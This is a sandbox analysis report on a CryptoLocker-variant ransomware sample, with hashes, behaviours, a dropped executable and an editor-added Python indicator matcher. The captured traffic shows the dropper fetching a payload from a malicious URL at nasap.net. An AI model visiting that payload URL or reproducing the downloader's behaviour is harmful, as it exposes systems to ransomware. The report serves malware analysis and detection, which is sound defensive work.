Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09/03/2024, 17:45 UTC

General

  • Target

    2024-03-09_e198d9b93ef99fd1b97ba2861ee6e21e_cryptolocker.exe

  • Size

    59KB

  • MD5

    e198d9b93ef99fd1b97ba2861ee6e21e

  • SHA1

    037e4c5bcd840f1bc8b55e185d3816bbdba1acdf

  • SHA256

    2ae82dcda31569c1502ff35952bb31f71e911cf0bb1265ce2e8f04f35e3c0135

  • SHA512

    174d6ae605a739a5b50e67403f594a4b718cdfd74f1e400b3a419da47912ed630a4f878ea2069906bc8d01777d125d21979127de5af625f9845c46df5abfb9a4

  • SSDEEP

    1536:btB9g/xtCSKfxLIc//Xr+/AO/kIZ3ft2nVuTKB6nggOlHdUHg:btng54SMLr+/AO/kIhfoKMHd5

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants (1 IoC)
  • Checks computer location settings (2 TTPs, 2 IoCs)

    Looks up the country code configured in the registry, likely a geofence check.

  • Executes dropped EXE (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory (3 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-09_e198d9b93ef99fd1b97ba2861ee6e21e_cryptolocker.exe (PID 3880, depth 1)
    Command line: "C:\Users\Admin\AppData\Local\Temp\2024-03-09_e198d9b93ef99fd1b97ba2861ee6e21e_cryptolocker.exe"
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe (PID 5048, depth 2, child of PID 3880)
      Command line: "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      • Checks computer location settings
      • Executes dropped EXE

Network

  Entries marked gewos.exe are traffic attributed to the dropped executable; the reverse (PTR) lookups below carry no process attribution and resolve to CDN and cloud ranges, so treat them as sandbox background noise rather than indicators of the sample. All DNS queries went to the resolver 8.8.8.8:53 (US).

  • DNS: 183.142.211.20.in-addr.arpa
    Request: 183.142.211.20.in-addr.arpa IN PTR
    Response: (none)
  • DNS: nasap.net (gewos.exe)
    Request: nasap.net IN A
    Response: nasap.net IN A 35.212.119.5
  • GET https://nasap.net/config/8mo.exe (gewos.exe)
    Remote address: 35.212.119.5:443 (US)
    Request:
      GET /config/8mo.exe HTTP/1.1
      Accept: text/*, application/*
      User-Agent: Updates downloader
      Host: nasap.net
      Cache-Control: no-cache
    Response:
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Sat, 09 Mar 2024 17:46:04 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      X-Cache-Enabled: False
      X-Redirect-By: WordPress
      Location: https://www.nasap.net/config/8mo.exe
      X-Httpd: 1
      Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
      X-Proxy-Cache: MISS
      X-Proxy-Cache-Info: W301 NC:000000 UP:
  • DNS: 5.119.212.35.in-addr.arpa
    Request: 5.119.212.35.in-addr.arpa IN PTR
    Response: 5.119.212.35.in-addr.arpa IN PTR 5.119.212.35.bc.googleusercontent.com
  • DNS: 205.178.17.96.in-addr.arpa
    Request: 205.178.17.96.in-addr.arpa IN PTR
    Response: 205.178.17.96.in-addr.arpa IN PTR a96-17-178-205.deploy.static.akamaitechnologies.com
  • DNS: 226.20.18.104.in-addr.arpa
    Request: 226.20.18.104.in-addr.arpa IN PTR
    Response: (none)
  • DNS: 73.159.190.20.in-addr.arpa
    Request: 73.159.190.20.in-addr.arpa IN PTR
    Response: (none)
  • DNS: www.nasap.net (gewos.exe)
    Request: www.nasap.net IN A
    Response: www.nasap.net IN CNAME nasap.net
              nasap.net IN A 35.212.119.5
  • DNS: www.nasap.net (gewos.exe)
    Request: www.nasap.net IN A
    Response: (none)
  • DNS: www.nasap.net (gewos.exe)
    Request: www.nasap.net IN A
    Response: (none)
  • DNS: 95.221.229.192.in-addr.arpa
    Request: 95.221.229.192.in-addr.arpa IN PTR
    Response: (none)
  • GET https://www.nasap.net/config/8mo.exe (gewos.exe)
    Remote address: 35.212.119.5:443 (US)
    Request:
      GET /config/8mo.exe HTTP/1.1
      Accept: text/*, application/*
      User-Agent: Updates downloader
      Cache-Control: no-cache
      Host: www.nasap.net
      Connection: Keep-Alive
    Response:
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Sat, 09 Mar 2024 17:46:22 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      X-Cache-Enabled: False
      Link: <https://www.nasap.net/index.php/wp-json/>; rel="https://api.w.org/"
      X-Httpd: 1
      Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
      X-Proxy-Cache: MISS
      X-Proxy-Cache-Info: W NC:000000 UP:
  • DNS: 232.168.11.51.in-addr.arpa
    Request: 232.168.11.51.in-addr.arpa IN PTR
    Response: (none)
  • DNS: 58.55.71.13.in-addr.arpa
    Request: 58.55.71.13.in-addr.arpa IN PTR
    Response: (none)
  • DNS: 26.165.165.52.in-addr.arpa
    Request: 26.165.165.52.in-addr.arpa IN PTR
    Response: (none)
  • DNS: 198.187.3.20.in-addr.arpa
    Request: 198.187.3.20.in-addr.arpa IN PTR
    Response: (none)
  • DNS: 18.134.221.88.in-addr.arpa
    Request: 18.134.221.88.in-addr.arpa IN PTR
    Response: 18.134.221.88.in-addr.arpa IN PTR a88-221-134-18.deploy.static.akamaitechnologies.com
  • DNS: 228.249.119.40.in-addr.arpa
    Request: 228.249.119.40.in-addr.arpa IN PTR
    Response: (none)
  • DNS: 193.78.101.95.in-addr.arpa
    Request: 193.78.101.95.in-addr.arpa IN PTR
    Response: 193.78.101.95.in-addr.arpa IN PTR a95-101-78-193.deploy.static.akamaitechnologies.com
  • DNS: 210.178.17.96.in-addr.arpa
    Request: 210.178.17.96.in-addr.arpa IN PTR
    Response: 210.178.17.96.in-addr.arpa IN PTR a96-17-178-210.deploy.static.akamaitechnologies.com
  • DNS: 11.227.111.52.in-addr.arpa
    Request: 11.227.111.52.in-addr.arpa IN PTR
    Response: (none)
  • DNS: 18.173.189.20.in-addr.arpa
    Request: 18.173.189.20.in-addr.arpa IN PTR
    Response: (none)
  Connection summary. Each entry lists destination, request, protocol, attributed process (where known), bytes sent / bytes received, and packets sent / packets received.

  • 35.212.119.5:443  https://nasap.net/config/8mo.exe  tls, http  gewos.exe
    Sent 1.7kB / Received 6.3kB; Packets 17 sent / 11 received
    HTTP Request: GET https://nasap.net/config/8mo.exe
    HTTP Response: 301
  • 35.212.119.5:443  https://www.nasap.net/config/8mo.exe  tls, http  gewos.exe
    Sent 2.7kB / Received 47.1kB; Packets 46 sent / 39 received
    HTTP Request: GET https://www.nasap.net/config/8mo.exe
    HTTP Response: 404
  • 8.8.8.8:53  183.142.211.20.in-addr.arpa  dns
    Sent 73 B / Received 159 B; Packets 1 sent / 1 received
    DNS Request: 183.142.211.20.in-addr.arpa
  • 8.8.8.8:53  nasap.net  dns  gewos.exe
    Sent 55 B / Received 71 B; Packets 1 sent / 1 received
    DNS Request: nasap.net
    DNS Response: 35.212.119.5
  • 8.8.8.8:53  5.119.212.35.in-addr.arpa  dns
    Sent 71 B / Received 122 B; Packets 1 sent / 1 received
    DNS Request: 5.119.212.35.in-addr.arpa
  • 8.8.8.8:53  205.178.17.96.in-addr.arpa  dns
    Sent 72 B / Received 137 B; Packets 1 sent / 1 received
    DNS Request: 205.178.17.96.in-addr.arpa
  • 8.8.8.8:53  226.20.18.104.in-addr.arpa  dns
    Sent 72 B / Received 134 B; Packets 1 sent / 1 received
    DNS Request: 226.20.18.104.in-addr.arpa
  • 8.8.8.8:53  73.159.190.20.in-addr.arpa  dns
    Sent 72 B / Received 158 B; Packets 1 sent / 1 received
    DNS Request: 73.159.190.20.in-addr.arpa
  • 8.8.8.8:53  www.nasap.net  dns  gewos.exe
    Sent 177 B / Received 89 B; Packets 3 sent / 1 received
    DNS Request: www.nasap.net (queried 3 times, answered once)
    DNS Response: 35.212.119.5
  • 8.8.8.8:53  95.221.229.192.in-addr.arpa  dns
    Sent 73 B / Received 144 B; Packets 1 sent / 1 received
    DNS Request: 95.221.229.192.in-addr.arpa
  • 8.8.8.8:53  232.168.11.51.in-addr.arpa  dns
    Sent 72 B / Received 158 B; Packets 1 sent / 1 received
    DNS Request: 232.168.11.51.in-addr.arpa
  • 8.8.8.8:53  58.55.71.13.in-addr.arpa  dns
    Sent 70 B / Received 144 B; Packets 1 sent / 1 received
    DNS Request: 58.55.71.13.in-addr.arpa
  • 8.8.8.8:53  26.165.165.52.in-addr.arpa  dns
    Sent 72 B / Received 146 B; Packets 1 sent / 1 received
    DNS Request: 26.165.165.52.in-addr.arpa
  • 8.8.8.8:53  198.187.3.20.in-addr.arpa  dns
    Sent 71 B / Received 157 B; Packets 1 sent / 1 received
    DNS Request: 198.187.3.20.in-addr.arpa
  • 8.8.8.8:53  18.134.221.88.in-addr.arpa  dns
    Sent 72 B / Received 137 B; Packets 1 sent / 1 received
    DNS Request: 18.134.221.88.in-addr.arpa
  • 8.8.8.8:53  228.249.119.40.in-addr.arpa  dns
    Sent 73 B / Received 159 B; Packets 1 sent / 1 received
    DNS Request: 228.249.119.40.in-addr.arpa
  • 8.8.8.8:53  193.78.101.95.in-addr.arpa  dns
    Sent 72 B / Received 137 B; Packets 1 sent / 1 received
    DNS Request: 193.78.101.95.in-addr.arpa
  • 8.8.8.8:53  210.178.17.96.in-addr.arpa  dns
    Sent 72 B / Received 137 B; Packets 1 sent / 1 received
    DNS Request: 210.178.17.96.in-addr.arpa
  • 8.8.8.8:53  11.227.111.52.in-addr.arpa  dns
    Sent 72 B / Received 158 B; Packets 1 sent / 1 received
    DNS Request: 11.227.111.52.in-addr.arpa
  • 8.8.8.8:53  18.173.189.20.in-addr.arpa  dns
    Sent 72 B / Received 158 B; Packets 1 sent / 1 received
    DNS Request: 18.173.189.20.in-addr.arpa
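
To turn the indicators in this report into something that can be run against your own telemetry, here is an added example written by the editor; it is not part of the sandbox report and not code from the sample. It copies the file hashes, domain, IP, URL path, User-Agent and dropped file name from the report above and matches them against proxy and file-creation log lines. The two log formats and the log lines themselves are constructed for illustration and are assumptions, not a real product's format.

```python
"""IOC matcher for the indicators in this sandbox report.

Added example by the editor, not part of the report or the sample.
Indicator values are copied from the report; the log formats are assumed:
  proxy:  <timestamp> <client_ip> <method> <url> <status> "<user-agent>"
  file:   <timestamp> <host> FileCreate <path> md5=<hex> sha256=<hex>
"""
import hashlib
import re
from urllib.parse import urlsplit

# Indicators taken from the report.
FILE_HASHES = {
    "e198d9b93ef99fd1b97ba2861ee6e21e",                                   # submitted sample, MD5
    "2ae82dcda31569c1502ff35952bb31f71e911cf0bb1265ce2e8f04f35e3c0135",  # submitted sample, SHA256
    "16f516b951a185d69c1bcd87a733160c",                                   # dropped gewos.exe, MD5
    "fe59a1b742559bb6918da62e2780a3c59ea6d71d6e51e3bb334ce6d3cf956896",  # dropped gewos.exe, SHA256
}
DOMAINS = {"nasap.net"}                 # www.nasap.net is a CNAME to the apex; subdomains match below
IPS = {"35.212.119.5"}
PAYLOAD_PATHS = {"/config/8mo.exe"}
USER_AGENTS = {"Updates downloader"}    # fixed, non-browser UA sent by gewos.exe
DROPPED_NAMES = {"gewos.exe"}

HTTP_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
FILE_RE = re.compile(r'^(\S+) (\S+) FileCreate (\S+) md5=([0-9a-f]{32}) sha256=([0-9a-f]{64})$')


def file_hashes(data: bytes) -> dict:
    """Compute the digests the report lists, for checking a recovered file."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256", "sha512")}


def host_matches(host: str) -> bool:
    """True for the known IP, the apex domain, or any subdomain of it."""
    host = host.lower().rstrip(".")
    return host in IPS or any(host == d or host.endswith("." + d) for d in DOMAINS)


def check_http(line: str) -> list:
    """Return the reasons a proxy line matches; empty list if it does not parse or match."""
    m = HTTP_RE.match(line)
    if not m:
        return []
    _ts, _src, _method, url, _status, ua = m.groups()
    u = urlsplit(url)
    reasons = []
    if host_matches(u.hostname or ""):
        reasons.append("host " + (u.hostname or ""))
    if u.path in PAYLOAD_PATHS:
        reasons.append("payload path " + u.path)
    if ua in USER_AGENTS:
        reasons.append("user-agent " + repr(ua))
    return reasons


def check_file(line: str) -> list:
    """Return the reasons a file-creation line matches; empty list otherwise."""
    m = FILE_RE.match(line)
    if not m:
        return []
    _ts, _host, path, md5, sha256 = m.groups()
    reasons = []
    if md5 in FILE_HASHES or sha256 in FILE_HASHES:
        reasons.append("known hash")
    norm = path.replace("\\", "/").lower()
    name = norm.rsplit("/", 1)[-1]
    if name in DROPPED_NAMES and "/appdata/local/temp/" in norm:
        reasons.append("dropped name in Temp: " + name)
    return reasons


def scan(lines) -> list:
    """Return (line, reasons) for every line matching at least one indicator."""
    hits = []
    for line in lines:
        reasons = check_http(line) or check_file(line)
        if reasons:
            hits.append((line, reasons))
    return hits


# Constructed sample telemetry (not from the report): two lines mirror the
# report's HTTP requests, one is benign browsing, one reuses only the UA, one
# is the dropped file as an EDR would log it, one is a benign empty file.
SAMPLE_LOG = [
    '2024-03-09T17:46:04Z 10.0.0.7 GET https://nasap.net/config/8mo.exe 301 "Updates downloader"',
    '2024-03-09T17:46:22Z 10.0.0.7 GET https://www.nasap.net/config/8mo.exe 404 "Updates downloader"',
    '2024-03-09T17:46:30Z 10.0.0.8 GET https://example.com/index.html 200 "Mozilla/5.0"',
    '2024-03-09T17:46:40Z 10.0.0.9 GET https://cdn.example.net/update.exe 200 "Updates downloader"',
    '2024-03-09T17:45:50Z WS01 FileCreate C:\\Users\\Admin\\AppData\\Local\\Temp\\gewos.exe md5=16f516b951a185d69c1bcd87a733160c sha256=fe59a1b742559bb6918da62e2780a3c59ea6d71d6e51e3bb334ce6d3cf956896',
    '2024-03-09T17:47:00Z WS02 FileCreate C:\\Users\\Bob\\Downloads\\notes.txt md5=d41d8cd98f00b204e9800998ecf8427e sha256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
]

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_LOG):
        print("HIT", reasons, line)
```

The fourth constructed line fires on the User-Agent alone. That is deliberate: at analysis time the payload URL returned 404, and the host sits behind a WordPress front on a Google Cloud address (per the PTR record), so the download location may change or the site may be cleaned while the downloader keeps sending its fixed "Updates downloader" User-Agent. Match on that behaviour as well as on the domain and hashes, and be aware that blocking 35.212.119.5 outright can affect other tenants of that cloud range.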

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\gewos.exe

    Filesize

    59KB (same size as the submitted sample, but different hashes)

    MD5

    16f516b951a185d69c1bcd87a733160c

    SHA1

    7a82b30fa01e1c259cf553ffabc3a6cf167b8104

    SHA256

    fe59a1b742559bb6918da62e2780a3c59ea6d71d6e51e3bb334ce6d3cf956896

    SHA512

    a0b315dfff247be44a503883c4a3cfdc2bbddc28eef8310a855366770d21d01f99973f51d25be546592274a4c85a156c1572721a0cf27d350b89783db53f9426

  • memory/3880-0-0x00000000020D0000-0x00000000020D6000-memory.dmp

    Filesize

    24KB

  • memory/3880-1-0x00000000020D0000-0x00000000020D6000-memory.dmp

    Filesize

    24KB

  • memory/3880-2-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

  • memory/5048-20-0x0000000002120000-0x0000000002126000-memory.dmp

    Filesize

    24KB
